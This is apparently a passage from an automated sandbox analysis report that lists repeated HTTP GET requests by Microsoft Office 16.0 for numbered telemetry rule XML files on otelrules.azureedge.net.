Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
